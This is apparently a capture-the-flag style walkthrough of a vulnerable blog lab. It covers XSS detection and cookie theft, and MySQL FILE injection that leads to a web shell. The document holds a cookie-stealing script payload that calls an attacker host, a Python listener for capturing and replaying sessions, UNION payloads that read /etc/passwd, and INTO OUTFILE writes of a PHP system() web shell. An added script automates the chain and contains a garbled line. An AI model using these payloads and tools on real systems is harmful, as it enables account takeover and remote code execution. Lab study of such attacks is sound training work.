XSS and MySQL FILE
Detecting Cross-Site Scripting
- Quick check: inject '"><
- Prefix it with a string that is easy to spot in the response, for example:
  1337'"><
- Testing with <script>alert(1)</script> is likely to be blocked by a WAF or other protection; a probe such as '"><  is less conspicuous and still shows which characters are reflected without encoding.
| Payload | Result | Exploitability |
|---|---|---|
| `1337'"><` | `1337'"><` | No encoding; a `<script>` tag can be used directly. |
| `1337'"><` | `1337'"&gt;&lt;` | `<` and `>` are encoded. You can still find XSS if you can inject directly inside a `<script>` tag, or inside some tags such as `<a` and `<img`. This encoding may also not be applied everywhere. |
| `1337'"><` | `1337'&quot;&gt;&lt;` | The encoding performed by many filters. JavaScript can still execute if you inject inside a `<script>` tag where your entry point is delimited by a single quote. |
| `1337'"><` | `1337&#39;&quot;&gt;&lt;` | With this encoding JavaScript executes only in very limited cases: when the value is echoed without single or double quotes (`<a id=[INPUT]`), or when you control a URL (`<a href="[INPUT]"`) and can use the `javascript:` handler. |
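The table above is the decision a tester makes by eye. As an added example (not code from the original page), the Python below automates it: it locates the `1337` marker in a response, records for each probe character whether it came back raw, entity-encoded or removed, and maps that onto the four rows. The response text in the comments and tests is constructed; function names are my own.

```python
# Added example: classify how a reflection point treated the probe 1337'"><
# so the right next payload can be chosen. Not part of the original page.
import html
import re
from typing import Dict, Optional

MARKER = "1337"
PROBE = MARKER + "'\"><"            # the four characters we care about, in order
ENTITY = re.compile(r"&#?[A-Za-z0-9]+;")


def reflected_fragment(body: str, marker: str = MARKER, width: int = 40) -> Optional[str]:
    """Find our marker in the response body and return it plus what follows it."""
    idx = body.find(marker)
    if idx < 0:
        return None                   # not reflected at all
    return body[idx:idx + len(marker) + width]


def probe_state(fragment: str) -> Dict[str, str]:
    """For each probe character, record 'raw', 'encoded' (any HTML entity that
    decodes to it, e.g. &gt; &#39; &#x27;) or 'removed' (filtered out)."""
    state: Dict[str, str] = {}
    pos = len(MARKER) if fragment.startswith(MARKER) else 0
    for ch in "'\"><":
        if fragment.startswith(ch, pos):
            state[ch] = "raw"
            pos += 1
            continue
        m = ENTITY.match(fragment, pos)
        if m and html.unescape(m.group()) == ch:
            state[ch] = "encoded"
            pos = m.end()
            continue
        state[ch] = "removed"         # nothing for this character at this position
    return state


def classify(fragment: str) -> str:
    """Map the probe state onto the rows of the exploitability table."""
    s = probe_state(fragment)
    if all(v == "raw" for v in s.values()):
        return "no-encoding"              # <script>alert(1)</script> works as is
    if all(v == "removed" for v in s.values()):
        return "stripped"                 # filter deleted everything; try other chars
    if s["<"] != "raw" and s[">"] != "raw" and s["'"] == "raw" and s['"'] == "raw":
        return "angle-brackets-encoded"   # only inside existing <script>, <a, <img ...
    if s["'"] == "raw" and all(s[c] != "raw" for c in "\"<>"):
        return "single-quote-survives"    # inside <script> with '-delimited strings
    if all(v != "raw" for v in s.values()):
        return "fully-encoded"            # unquoted attributes or javascript: URLs only
    return "partial"                      # some other mix: inspect the context by hand
```

Run it over the raw HTTP response, not the rendered page: the browser's DOM view already decodes entities, which is exactly the information this check needs.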
Exploitation
- The ISO periodically visits the site and executes the scripts on the page. Run a local server (10.0.2.128) to act as the malicious host and post the payload on the comment board at http://10.0.2.130; once the ISO renders the page, the stolen cookie shows up in the local server's log.
- Malicious payload:
  <script>document.write('<img src="http://10.0.2.128/?'+document.cookie+'"/>');</script>
- Retrieved from the log:
  GET /?PHPSESSID=a0pgvu68i67l5fp449ecn2gav2 HTTP/1.1
- Set the stolen cookie in the browser's developer console:
  document.cookie = "PHPSESSID=a0pgvu68i67l5fp449ecn2gav2"
- Browse to http://10.0.2.130/admin/ and you are logged in as admin.
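The three steps above (plant the payload, catch the cookie, replay it) need a listener on 10.0.2.128. As an added example that is not from the original page, here is one in Python's standard library, together with helpers that build the same `<img>`-based payload and turn the captured query string back into a Cookie header. The listener address, port and the sample paths in the tests are assumptions.

```python
# Added example: the cookie-catching listener for the walkthrough above.
# Not part of the original page; 10.0.2.128 and port 80 are assumed.
import logging
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Dict
from urllib.parse import unquote, urlsplit
from urllib.request import Request, urlopen


def exfil_payload(listener: str) -> str:
    """Same technique as the payload above: an <img> whose src carries document.cookie."""
    return ("<script>document.write('<img src=\"" + listener.rstrip("/")
            + "/?'+document.cookie+'\"/>');</script>")


def cookies_from_path(path: str) -> Dict[str, str]:
    """'/?PHPSESSID=abc;%20theme=dark' -> {'PHPSESSID': 'abc', 'theme': 'dark'}.
    document.cookie joins pairs with '; ', so this is not a normal query string."""
    cookies: Dict[str, str] = {}
    for part in unquote(urlsplit(path).query).split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return cookies


def cookie_header(cookies: Dict[str, str]) -> str:
    """Rebuild a Cookie: header for replaying the stolen session
    (what the document.cookie line in the console achieves)."""
    return "; ".join(f"{k}={v}" for k, v in cookies.items())


def fetch_as(url: str, cookies: Dict[str, str]) -> bytes:
    """GET `url` (e.g. http://10.0.2.130/admin/) with the stolen session."""
    req = Request(url, headers={"Cookie": cookie_header(cookies)})
    with urlopen(req, timeout=10) as resp:
        return resp.read()


class ExfilHandler(BaseHTTPRequestHandler):
    """Log the cookies carried by every GET and answer 204 so the <img> fails quietly."""

    def do_GET(self) -> None:
        logging.info("%s -> %s", self.client_address[0], cookies_from_path(self.path))
        self.send_response(204)
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # keep the default access log out of the way; we log the parsed cookies


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO, format="%(asctime)s %(message)s")
    # Port 80 matches the payload URL above and needs root; use 8080 and change
    # the listener URL passed to exfil_payload() if you would rather not.
    HTTPServer(("0.0.0.0", 80), ExfilHandler).serve_forever()
```

The victim's browser only needs the request to leave; nothing has to be returned, which is why a 204 is enough and why a plain `nc -l` also works for a one-off.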
 
SQL injection with MySQL FILE
- http://10.0.2.130/admin/edit.php?id=0 is vulnerable to SQL injection (id=0 matches no real post, so the page shows only the injected row):
  UNION SELECT 1,@@version,load_file("/etc/passwd"),4
  load_file() needs the FILE privilege, and on newer MySQL the path must also be allowed by secure_file_priv.
 
Exploitation to deploy a Web Shell
- Use the PHP array trick id[]= to provoke an error message: http://10.0.2.130/admin/edit.php?id[]=1 returns
  Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /var/www/classes/post.php on line 111
  Notice: Undefined variable: post in /var/www/classes/post.php on line 115
  which discloses the script path /var/www/classes/post.php.
- Create a file with SELECT 1,2,3,4 INTO OUTFILE, for example:
  http://10.0.2.130/admin/edit.php?id=1 union select 1,2,3,4 into outfile "/var/www/classes/s.php"
  Requesting http://10.0.2.130/classes/s.php then returns a 404, so the write failed.
- Next attempt:
  http://10.0.2.130/admin/edit.php?id=1 union select 1,2,3,4 into outfile "/var/www/s.php"
  which also fails.
- Finally
  http://10.0.2.130/admin/edit.php?id=1 union select 1,2,3,4 into outfile "/var/www/css/s.php"
  succeeds and the file is served with the contents
  1 Welcome Welcome to my blog. Leave a comment if you like the new design :) \N 1 2 3 4
  INTO OUTFILE writes as the mysqld OS user, so the target directory has to be writable by it and the file must not already exist. Note that sqlmap's --os-pwn does not try /css by default.
- Once file creation is confirmed, write a second file with the PHP system code in one of the columns:
  select 1,2,"<?php system($_GET['c']); ?>",4 into outfile "/var/www/css/z.php"
- Execute a command:
  http://10.0.2.130/css/z.php?c=uname -a
  1 Welcome Welcome to my blog. Leave a comment if you like the new design :) \N 1 2 Linux debian 2.6.32-5-686 #1 SMP Mon Sep 23 23:00:18 UTC 2013 i686 GNU/Linux 4
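The directory hunt above was done by hand. As an added example (my code, not from the original page or from PentesterLab), the Python below scripts the whole chain: pull the script path out of the PHP warning, derive candidate directories, inject an INTO OUTFILE write test into each and ask the web server whether the file is served, then write the shell and build the command URL. The host, edit.php path and /var/www come from the walkthrough; the candidate directory list, the file names and the use of id=0 (so only the injected row lands in the file) are my choices. The `fetch` callable is injected so the logic can be exercised offline with a constructed stand-in.

```python
# Added example: automate the INTO OUTFILE directory hunt and shell drop.
# Not part of the original page. Candidate dirs and file names are assumptions.
import posixpath
import re
from typing import Callable, Iterable, List, Optional
from urllib.error import HTTPError
from urllib.parse import quote
from urllib.request import urlopen

PHP_PATH = re.compile(r" in (/\S+\.php) on line \d+")


def leaked_paths(error_page: str) -> List[str]:
    """Absolute script paths disclosed by PHP warnings/notices (the id[]= trick)."""
    return sorted(set(PHP_PATH.findall(error_page)))


def candidate_dirs(script_path: str, webroot: Optional[str] = None,
                   extra: Iterable[str] = ("css", "images", "js", "uploads")) -> List[str]:
    """Directories worth trying, in order: the script's own directory, the web
    root, then common static-asset folders. Unless given, the web root is
    assumed to be the parent of the script's directory."""
    script_dir = posixpath.dirname(script_path)
    webroot = webroot or posixpath.dirname(script_dir)
    return [script_dir, webroot] + [posixpath.join(webroot, d) for d in extra]


def outfile_payload(columns: int, path: str, content: Optional[str] = None,
                    column: int = 3) -> str:
    """UNION row that MySQL writes to `path`. Without content it is a pure write
    test (1,2,3,4); with content, the PHP source replaces one column.
    MySQL requires: FILE privilege, secure_file_priv allowing the directory,
    the mysqld OS user able to write there, and the file not existing yet."""
    cells = [str(i) for i in range(1, columns + 1)]
    if content is not None:
        escaped = content.replace("\\", "\\\\").replace('"', '\\"')
        cells[column - 1] = '"' + escaped + '"'
    return f'union select {",".join(cells)} into outfile "{path}"'


def inject_url(edit_url: str, payload: str, row_id: int = 0) -> str:
    """id=0 matches no real post, so only the injected row ends up in the file."""
    return f"{edit_url}?id={quote(f'{row_id} {payload}')}"


def http_status(url: str) -> int:
    """Real `fetch`: the status code of a GET, with 4xx/5xx returned, not raised."""
    try:
        with urlopen(url, timeout=5) as resp:
            return resp.status
    except HTTPError as err:
        return err.code


def find_writable_dir(fetch: Callable[[str], int], edit_url: str, site_url: str,
                      webroot: str, dirs: Iterable[str], columns: int = 4,
                      name: str = "s.php") -> Optional[str]:
    """For each directory: inject a write, then request the file over HTTP.
    A 200 means MySQL could write there and the web server serves it."""
    for d in dirs:
        target = posixpath.join(d, name)
        fetch(inject_url(edit_url, outfile_payload(columns, target)))
        if fetch(f"{site_url}/{posixpath.relpath(target, webroot)}") == 200:
            return d
    return None


WEBSHELL = "<?php system($_GET['c']); ?>"   # the shell used on the page


def shell_url(site_url: str, webroot: str, shell_path: str, cmd: str) -> str:
    """URL that runs `cmd` through the dropped shell, with the command URL-encoded."""
    return f"{site_url}/{posixpath.relpath(shell_path, webroot)}?c={quote(cmd)}"


if __name__ == "__main__":
    edit = "http://10.0.2.130/admin/edit.php"
    site, root = "http://10.0.2.130", "/var/www"
    path = leaked_paths(http_status and "")  # replace with the id[]= error page text
    d = find_writable_dir(http_status, edit, site, root, candidate_dirs("/var/www/classes/post.php"))
    if d:
        http_status(inject_url(edit, outfile_payload(4, posixpath.join(d, "z.php"), WEBSHELL)))
        print(shell_url(site, root, posixpath.join(d, "z.php"), "uname -a"))
```

Because INTO OUTFILE fails silently from the attacker's side (the page just renders without the row), the only reliable signal is the follow-up HTTP request for the file; that is why the probe checks the served URL rather than the injection response.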